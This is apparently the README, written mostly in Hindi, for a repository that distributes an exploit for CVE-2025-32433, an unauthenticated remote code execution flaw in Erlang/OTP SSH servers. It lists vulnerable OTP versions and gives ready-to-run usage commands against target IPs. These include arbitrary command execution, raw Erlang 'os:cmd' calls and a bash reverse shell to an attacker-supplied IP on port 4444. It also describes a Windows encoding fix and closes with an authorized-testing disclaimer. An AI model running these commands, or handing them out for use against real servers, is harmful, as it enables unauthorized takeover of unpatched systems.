
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unicode checkmark with ASCII character for Windows compatibility
Erlang/OTP SSH अप्रमाणित दूरस्थ कोड निष्पादन
इस रिपॉजिटरी में CVE-2025-32433 के लिए एक एक्सप्लॉइट है, जो Erlang/OTP SSH सर्वर में एक गंभीर अप्रमाणित दूरस्थ कोड निष्पादन भेद्यता है।
मुख्य विशेषताएं:
CVE ID: CVE-2025-32433
गंभीरता: गंभीर
प्रभाव: अप्रमाणित दूरस्थ कोड निष्पादन
यह भेद्यता हमलावरों को बिना प्रमाणीकरण के विशेष रूप से तैयार किए गए SSH प्रोटोकॉल संदेश भेजकर Erlang/OTP SSH सर्वरों पर मनमाने सिस्टम कमांड निष्पादित करने की अनुमति देती है।
OTP ≤ 27.3.2
OTP ≤ 26.2.5.10
OTP ≤ 25.3.2.19
OTP ≥ 17.0 and older (likely)
# Basic command execution
python exploit.py -t <target-ip> -p 2222 -c "whoami"
# Execute system command
python exploit.py -t 192.168.1.100 -p 2222 -c "touch /tmp/pwned"
# Raw Erlang code execution
python exploit.py -t 192.168.1.100 -p 2222 -e 'os:cmd("id").'
# Reverse shell
python exploit.py -t 192.168.1.100 -p 2222 -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
-t, --target Target IP address (default: 127.0.0.1)
-p, --port Target port (default: 2222)
-c, --command System command to execute
-e, --erlang Raw Erlang code to execute
यह संस्करण मूल एक्सप्लॉइट में मौजूद एन्कोडिंग समस्या को ठीक करता है:
समस्या: मूल एक्सप्लॉइट ने यूनिकोड चेकमार्क वर्ण (✓, U+2713) का उपयोग किया जो विंडोज पर GBK एन्कोडिंग त्रुटियों का कारण बनता है:
'gbk' codec can't encode character '✓' in position 1: illegal multibyte sequence
समाधान: क्रॉस-प्लेटफॉर्म संगतता के लिए यूनिकोड वर्ण को मानक ASCII + वर्ण से बदल दिया गया।
एक्सप्लॉइट इस प्रकार काम करता है:
os:cmd() के माध्यम से मनमाना Erlang कोड निष्पादित करनायह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर जिनका परीक्षण करने की आपको स्पष्ट अनुमति है।
MIT लाइसेंस
चुज़ौX द्वारा विंडोज संगतता के लिए संशोधित